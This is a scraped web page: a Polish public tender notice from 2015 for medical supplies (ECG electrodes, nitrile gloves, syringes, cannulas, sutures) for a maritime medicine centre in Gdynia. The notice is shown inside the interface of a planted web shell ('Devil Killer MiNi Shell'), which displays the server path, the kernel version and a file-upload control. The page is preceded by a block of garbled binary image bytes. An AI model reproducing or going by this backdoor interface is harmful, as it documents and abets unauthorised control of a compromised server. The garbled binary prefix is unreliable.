JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150716/179962-N-2015.html

<p class="kh_header"><b>Gdynia: Sukcesywne dostawy podstawowych wyrobów medycznych dla potrzeb Uniwersyteckiego Centrum Medycyny Morskiej i Tropikalnej w Gdyni</b><br>
<b>Numer ogłoszenia: 179962 - 2015; data zamieszczenia: 16.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej , ul. Powstania Styczniowego 9b, 81-519 Gdynia, woj. pomorskie, tel. 058 6998605, faks 058 6224871.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ucmmit.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy podstawowych wyrobów medycznych dla potrzeb Uniwersyteckiego Centrum Medycyny Morskiej i Tropikalnej w Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy podstawowych wyrobów medycznych dla potrzeb Uniwersyteckiego Centrum Medycyny Morskiej i Tropikalnej w Gdyni, określone w 14 pakietach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o zamówienie publiczne w zakresie  dostaw określonych w pakietach 1-14, Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić gdy:
1.w trakcie trwania umowy ceny ulegną zmianie w przypadku zmian (także obniżki) podatku VAT  bezpośrednio związanych z przedmiotem zamówienia, a zmiana cen odbywa się na podstawie Aneksu do umowy.2.wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron, 3.zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji  albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy (w tym zmiana stawek celnych), 4.zaistnienie siły wyższej uniemożliwiającej okresowe wykonywanie przedmiotu umowy,
5.wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane  przez Wykonawcę, 6.w trakcie trwania umowy Wykonawca zaproponuje obniżoną cenę wyrobu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ucmmit.gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej, ul. Powstania Styczniowego 9b, 81-519 Gdynia, pok 150.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2015 godzina 10:00, miejsce: Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej, ul. Powstania Styczniowego 9b, 81-519 Gdynia, pok 30. Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nieinwazyjny system mocowań do zabezpieczenia cewników, sond, linii, przewodów o średnicy   3mm  x max  8mm             sztuka	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miska głeboka jednorazowa,  pojemność min 3000ml wykonana  z  pulpy celulozowej z możliwością stosowania w niej detergentu , ciepłej wody  i mydła co nie powoduje jej szybkiego rozmiękania (czas stosowania min 30min)   sztuka	2000
2. Kaczka tradycyjna pojemność około 800-1000ml. Wykonana z pulpy celulozowej, nie przemakające.Czas wytrzymałości bez rozmiękczania  min 20min    sztuka	1 200
3. Żel do USG 500ml w butelce z tworzywa sztucznego .Wykazuje dużą odporność na wysychanie.Posiada odpowiednią lepkość,która zapewnia dobrą przyczepność żelu i niespływanie podczas badania,posiadający neutralny odczyn ph.Butelka zabezpieczona aplikatorem zatyczką		butelka	50
4. Pojemnik plastikowy o pojemności 1L jednorazowego użytku na zużyty sprzet medyczny o wysokości nie mniejszej niż 20cm i nie wyższe niz 25cm (np..venflony, strzykawki, igły, opatrunki).Wieko pojemników zatrzaskowe ,zamkniecie pojemnika uniemożliwia jego ponowne otwarcie.Wieko pojemników z profilowymi otworami.Kolor pojemnika czerwony.		sztuka	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Elektroda przeznaczona do diagnostyki i monitorowania długoterminowego do badań EKG Rozmiar 42x 45mm.Wykonane w technologii stałożelowej pianka polietylenowa,klej hypoalergiczny.Zapewniająca dobre przyleganie i przewodność podczas ruchu i pocenia się Czujnik Ag/AgCl zawierający języczek ułatwiający odklejanie elektrod.	sztuka	9000
2. Elektroda jednorazowego uzytku,przeznaczona do diagnostycznych badan wysiłkowych i długookresowych przeznaczonych do szybkiego wykonania 12-odprowadzeniowego zapisu EKG.Wymagany materiał bazowy -włóknina perforowana, ułatwiajaca skórze oddychanie i zapobiegająca odparzeniom z możliwoscią stosowania przy badaniach holterowskich.. Elektrody muszą posiadać odpowiednie rozmiary o 50mn. Powinny posiadać dużą powierzchnię czujnika AG/AgCl, równą powierzchni całej elektrody.Klej na elektrodzie zapewniający właściwe przyleganie elektrod do skóry ,nie powodujący jej podrażnień       sztuka	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rękawice diagnostyczne nitrylowe do badań, cienkie z aloesem, grubość na palcach 0,1 +/-0,01 mm, mikroteksturowane z dodatkową teksturą na palcach, AQL 1,5 (fabrycznie naniesiona informacja na opakowaniu),  zgodność z normą EN 455 potwierdzona przez jednostkę notyfikowaną, oznakowane jako wyrób medyczny Klasy I i środek ochrony indywidualnej Kategorii III z adekwatnym oznakowaniem na opakowaniu (norma EN 455, EN 374,EN 420). Odporne na przenikanie substancji chemicznych zgodnie z normą EN 374-3  oraz na przenikalność wirusów zgodnie z normą ASTM F 1671 (fabryczne oznakowanie na opakowaniu). Siła zrywania  min. 6 N. Rozmiary XS-XL do wyboru zamawiającego, opakowanie max 200szt  			sztuka	300000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw pojemnika do pobierania krwi (upusty)- sterylny o poj.min.450ml. Zestaw pojemnika z  igłą biorczą , zawierający antykoagulant CPDA-1, dren biorczy wyposażony w port bezpiecznego pobierania próbek krwi.	sztuka	20
2. Automatyczna staza samozaciskowa z elastycznej taśmy, posiadająca łatwe w uzyciu zapięcie z możliwością stopniowego uwalniania ucisku jednym przyciskiem. Do sterylizacji w autoklawie parą wodną		sztuka	30
3. Maska do tlenoterapii wysokim stężeniem tlenu z rezerwuarem tlenu(workiem)  zastawki jednokierunkowe i drenem min 200 cm. Regulacja paska obwodu głowy. Rozmiar dla dorosłych		sztuka	120
4. Maska tlenowa bez worka do podawania tlenu, z drenem ok 2 m., dla dorosłych.			sztuka	60
5. Orginalne dreny do pompy objętościowej Infusomat  ,czarne,długość min 140cm			sztuka	60
6. Strzykawka trzyczęściowa 50(60)ml przystosowana do pomp infuzyjnych sterylna polipropylenowa, końcówka Luer-lock, rondo tłoka ściśle przylegające do ścian strzykawki o płynnym przesuwie, szczelna, długość całkowita strzykawki powinna wynośić 161 mm, przeźroczysta jałowa z widoczną datą ważności na opakowaniu, pakowana pojedynczo		sztuka	850
7. Przyrząd do przetaczania krwi  i preparatów krwiopochodnych z zaciskaczem rolkowym, bez zawartości PCV w komorze kroplowej, opakowanie jednostkowe foliowo - papierowe; 		sztuka	1 000
8. Strzykawka 100ml  typu JANETA lub równoważna, sterylna z dołączonym łącznikiem LUER, wyposażona w podwójną skalę pomiarową i podwójne uszczelnienie tłoka, opakowanie jednostkowe typu blister-pack, Wyrób niepirogenny, nietoksyczny.	sztuka	450
9. Rurka ustno-gardłowa sterylna oznaczenie róznymi kolorami rozmiaru rurki.Rozmiar do wyboru zamawiającego	sztuka	150
10. Przedłuzacz do pomp infuzyjnych przezroczysty  długość od min 150-200cm			sztuka	500
11. Strzykawka 10ml iniekcyjna 	sztuka	6 000
12. Igły jednorazowego uzytku do nakłuć lędzwiowych .Rozmiar 20G(0,90x 90)			 sztuka	50
13. Kranik odcinający trójdrożny bez przedłużacza sterylny,pojedyńczo pakowany			 sztuka	1 200
14. Pojemnik plastikowy jednorazowego uzytku z zakrętk, poj  min 2L do dobowej zbiórki moczu	sztuka	200
15. Jednorazowe ,sterylne bezpieczne w uzyciu nakłuwacze palca do pobierania krwi .Rozmiar 21G,głebokość nakłucia 2,4mm typ medlance plus lub równoważne		sztuka	6 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kaniula i.v. bezpieczna,  z biokompatybilnego silikonowanego poliuretanu posiadającego kliniczne badania na zmniejszanie powikłań zakrzepowo-zapalnych , 6 markerów RTG wtopionych w strukturę  materiału. Port boczny/górny zabezpieczony nieobrotowym korkiem na zawiasie klik-klak w kodzie barwnym odpowiadającym rozmiarowi Gauge kaniuli.  Kaniula ma posiadać samoczynną, inicjowaną taśmą, gładką, plastikową blokadę ostrza chroniącą przed ekspozycją na zakłucie,  wyposażoną w pochłaniacz kropli krwi wypływu wstecznego zabezpieczający przed ekspozycją na jej rozprysk w postaci systemu mikrokapilar. Rozmiary: 22-20-18-17-16-14 G do wyboru Zamawiającego. Opakowanie sztywne, typu Tyvek lub równoważne z podaną średnicą, długością kaniuli i prędkością przepływu, numerem katalogowym i numerem serii.		sztuka	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia  dł.igły 17 mm, 3/8 koła-okrągło tnąca; rozmiar 4/0;nitka bezbarwna długość szwu 75 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach		sztuka	60
2.Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia   dł.igły 26 mm, 1/2 koła-okrągła rozwarstwiająca; rozmiar 3/0; długość szwu 75 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach		sztuka	60
3. Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia    dł.igły 31 mm, 1/2 koła-ookrągła rozwarstwiająca; rozmiar 2/0; długość szwu 75 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach		sztuka	120
4. Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,;powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia   dł.igły 48 mm, 1/2 koła-okrągła wzmocniona; rozmiar 0;szew z pokryciem antybakteryjnym  długość szwu 90 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach		sztuka	72
